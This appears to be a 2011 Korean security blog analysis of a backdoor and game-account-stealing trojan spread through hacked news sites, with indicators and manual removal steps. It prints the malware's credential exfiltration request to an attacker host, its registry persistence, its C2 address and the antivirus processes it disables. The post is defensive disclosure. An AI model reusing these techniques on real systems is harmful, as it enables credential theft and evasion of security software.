울지않는벌새 : Security, Movie & Society

백도어 + 온라인 게임 계정 유출형 악성코드 유포 주의 (2011.8.16)

벌새::Analysis
최근 해킹된 언론 사이트를 통해 유포되는 악성코드 중에서 백도어(원격 제어) 기능과 온라인 게임 계정 정보를 함께 수집하는 혼합된 방식의 악성코드가 발견되고 있습니다.

이미 취약점을 이용한 악성코드 감염시 백도어(Backdoor) 기능을 하는 사례가 확인이 되었으며, 이는 네이트닷컴, 싸이월드 해킹처럼 플러스 효과를 노리는 것일 수도 있다고 판단됩니다.

이번 악성코드 유포 방식은 Internet Explorer 웹 브라우저 CVE-2010-0806 취약점과 Adobe Flash Player CVE-2011-2110 취약점을 이용한 것으로 진단 내역은 다음과 같습니다.

파일명 보안 제품 진단명
main.swf Hauri ViRobot SWF.S.Exploit.3853
c.html nProtect Script-JS/W32.Agent.CQU
x.html Microsoft Exploit:JS/CVE-2010-0806.gen!A


해당 악성 스크립트를 통해 최종적으로 다운로드된 실행 파일(MD5 : 020528715397daa4547aed8e6b8c94a9)에 대하여 안철수연구소(AhnLab) V3 보안 제품에서는 Dropper/Win32.OnlineGameHack (VirusTotal : 20/43) 진단명으로 진단되고 있습니다.

[생성 파일 및 진단 정보]

C:\svchost.exe :: 숨김(H) 속성
 - MD5 : c4c56b769a4f5bb61f025638c0f0e96a
 - AhnLab V3 : Dropper/Win32.PcClient (VirusTotal : 15/43)

C:\WINDOWS\WindowShell.Manifest
 - MD5 : CDE7C2C6C95CBA3A2AC1AB88670D025F
 - NOD32 : a variant of Win32/Farfli.BS (VirusTotal : 7/43)

C:\WINDOWS\Config\236.bat

C:\WINDOWS\system32\2011815212049.dll :: ws2help.dll 백업 파일(정상 파일)
※ 해당 파일은 2011(9~10자리 숫자).dll 형태입니다.

C:\WINDOWS\system32\ws2help.dll :: 변경 전 - 19,968 Bytes / 변경 후 - 95,768 Bytes
 - MD5 : 302ecf538623a6c81870623651fb08d3
 - avast! : Win32:OnLineGames-FZQ [Trj] (VirusTotal : 9/43)

C:\WINDOWS\system32\ws3help.dll :: ws2help.dll 백업 파일(정상 파일)
[생성 레지스트리 등록 정보]

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
 - Userinit = C:\WINDOWS\system32\userinit.exe, :: 변경 전
 - Userinit = C:\WINDOWS\system32\userinit.exe,C:\svchost.exe :: 변경 후
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services
 - Type = 120
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
 - Type = 120


감염된 환경에서는 레지스트리 변경을 통하여 시스템 시작시 숨김(H) 속성으로 등록된 악성 svchost.exe 파일을 자동 실행되도록 구성되어 있습니다.

svchost.exe

시스템 시작시 자동 실행되는 svchost.exe 파일은 중국에서 제작된 것으로 추정되며, 다음과 같은 악의적인 동작을 합니다.

svchost.exe

svchost.exe 파일은 감염시 생성된 [C:\WINDOWS\Config\236.bat] 파일을 불러와 rundll32.exe 프로세스를 상주시킵니다.

236.bat

236.bat 파일 내부를 확인해보면 rundll32.exe 파일을 불러와 "rundll32.exe C:\WINDOWS\WindowShell.Manifest, Instanc @exit" 커맨드 명령을 통해 생성된 [C:\WINDOWS\WindowShell.Manifest] 파일을 추가하여 동작하는 것을 확인할 수 있습니다.

감염시 프로세스 정보를 확인해보면 cmd.exe 커맨드 명령을 통해 rundll32.dll 프로세스를 로딩하여 WindowShell.Manifest 파일을 추가하여 동작하는 것을 확인할 수 있습니다.(※ 사용자가 Internet Explorer 웹 브라우저를 실행할 경우 iexplore.exe 프로세스에 악성 ws2help.dll 파일을 추가하여 온라인 게임 정보를 수집하여 외부로 유출하는 동작을 확인할 수 있습니다.)

rundll32.exe 프로세스는 미국(USA)에 위치한 98.126.76.243:901 IP를 통해 지속적으로 연결을 유지하며 공격자의 추가적인 명령에 따라 원격 제어 등을 통한 정보 유출, 추가적인 다운로드 등이 발생할 것으로 추정됩니다.

또한 기존과 동일하게 ws2help.dll(Windows Socket 2.0 Helper for Windows NT) 시스템 파일을 ws3help.dll 파일로 백업 및 패치하여 피망(PMang), 한게임(HanGame), 넷마블, 메이플스토리(MapleStory), 던전 앤 파이터 등의 온라인 게임 계정 정보를 수집하여 외부로 유출하고 있습니다.

● 온라인 게임 감시 프로세스 : PCOTP.exe, lin.bin, FF2Client.exe, MapleStory.exe, dnf.exe, IEXPLORE.EXE

ws2help.dll 악성 파일은 사용자 PC에 설치된 알약(ALYac), 네이버 백신, 사이트가드(SiteGuard), V3 보안 제품 기능을 무력화하는 기능이 포함되어 있습니다.

● 보안 제품 감시 프로세스 : AYUpdSrv.aye, AYRTSrv.aye, AYServiceNT.aye, AYAgent.aye, NVCAgent.npc, nsvmon.npc, Nsavsvc.npc, NaverAgent.exe, V3Light.exe, V3LTray.exe, V3LRun.exe, SgSvc.exe, V3LSvc.exe

예를 들어 한게임(HanGame) 사이트에 접속하여 로그인을 시도할 경우 다음과 같은 정보 유출이 이루어지는 것을 확인할 수 있습니다.


GET /jack/hg/mail.asp?a1=HG&a3=(사용자 ID)&a4=(비밀번호)&r=5677&a12=2011811200305 HTTP/1.1
User-Agent: WinInet
Host: jack.auto654.com
Cache-Control: no-cache
  • h**p://www.yyaakk.com/xo/df/mail.asp
  • h**p://www.yyaakk.com/xo/dfotp/mail.asp
  • h**p://jack.auto654.com/jack/pm/mail.asp
  • h**p://jack.auto654.com/jack/hg/mail.asp
  • h**p://jack.auto654.com/jack/mxd/mail.asp
  • h**p://jack.auto654.com/jack/t1/mail.asp
  • h**p://jack.auto654.com/jack/mxdotp/mail.asp
  • h**p://jack.auto654.com/jack/ax/mail.asp
  • h**p://jack.auto654.com/jack/net/mail.asp
  • h**p://jack.auto654.com/jack/ar/mail.asp
  • h**p://jack.auto654.com/jack/cq/mail.asp

해당 악성코드에 감염된 사용자는 보안 제품(전용 백신)을 통한 치료가 어려운 경우 다음과 같은 방식으로 수동으로 해결하시기 바랍니다.(※ 반드시 모든 프로그램을 종료한 상태로 진행하시기 바랍니다.)

1. 작업 관리자에서 rundll32.exe 프로세스를 수동으로 종료합니다.

2. 다음 파일을 수동으로 삭제하시기 바랍니다.

  • C:\svchost.exe
  • C:\WINDOWS\Config\236.bat
  • C:\WINDOWS\system32\2011(9~10자리 숫자).dll

단, svchost.exe 파일은 숨김(H) 속성이므로 폴더 옵션에서 [숨김 파일, 폴더 및 드라이브 표시] 항목을 체크하시기 바랍니다.

3. [C:\WINDOWS\system32\ws2help.dll] 파일의 확장자 명을 ws2help.dll- 형태로 변경하시기 바랍니다.

파일 확장자를 변경한 경우 윈도우 파일 보호(WFP) 기능을 통해 자동으로 정상적인 ws2help.dll 파일이 복원되므로 반드시 복원 여부를 확인하시기 바랍니다.

4. 다음의 레지스트리 항목을 "변경 후" 값으로 수정하시기 바랍니다.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
 - Userinit = C:\WINDOWS\system32\userinit.exe,C:\svchost.exe :: 변경 전
 - Userinit = C:\WINDOWS\system32\userinit.exe, :: 변경 후

참고로 해당 그림에서는 감염된 상태의 레지스트리 값(변경 전)에서 감염 이전의 기본 레지스트리 값(변경 후)으로 변경시 "C:\WINDOWS\system32\userinit.exe," 값 데이터를 올바르게 넣으시기 바랍니다.

5. 반드시 시스템 재부팅을 하신 후, 다음의 파일을 수동으로 삭제하시기 바랍니다.

  • C:\WINDOWS\system32\ws2help.dll-
  • C:\WINDOWS\system32\ws3help.dll

해당 악성코드는 기본적으로 보안 패치가 제대로 이루어지지 않은 PC 사용자가 해킹된 인터넷 사이트 방문시 자동으로 감염될 수 있으므로 주기적으로 최신 보안 패치를 체크하여 설치하는 습관이 가장 중요합니다.